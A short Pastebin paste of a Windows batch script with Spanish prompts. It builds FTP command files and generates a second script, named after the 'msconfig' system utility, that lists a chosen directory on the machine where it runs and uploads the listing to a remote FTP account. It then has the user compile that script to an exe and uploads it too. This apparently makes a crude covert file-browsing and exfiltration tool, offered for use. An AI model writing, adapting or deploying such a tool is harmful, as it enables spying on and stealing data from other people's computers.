Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- echo off
- cls
- cd\
- (
- user
- pass
- type binary
- get dir.txt
- bye
- )>>1.txt
- ftp -v -s:c:\1.txt cuenta-ftp
- type dir.txt
- set /p m="Escriva la ruta por la que desea moverse>"
- (
- cd^\
- cd ^%m^%
- dir^>dir.txt
- ^(
- user
- pass
- type binary
- put dir.txt
- bye
- ^)^>^>1.txt
- ftp -v -s^:c^:^\1.txt cuenta-ftp
- del 1.txt
- del dir.txt
- )>>msconfigA.txt
- start msconfigA.txt
- msg Ahora paselo a exe y guardelo en %systemdrive%
- cls
- pause
- del msconfig.txt
- (
- user
- pass
- type binary
- put msconfigA.exe
- bye
- )>1.txt
- ftp -v -s:c:\1.txt cuenta-ftp
Advertisement
Add Comment
Please, Sign In to add comment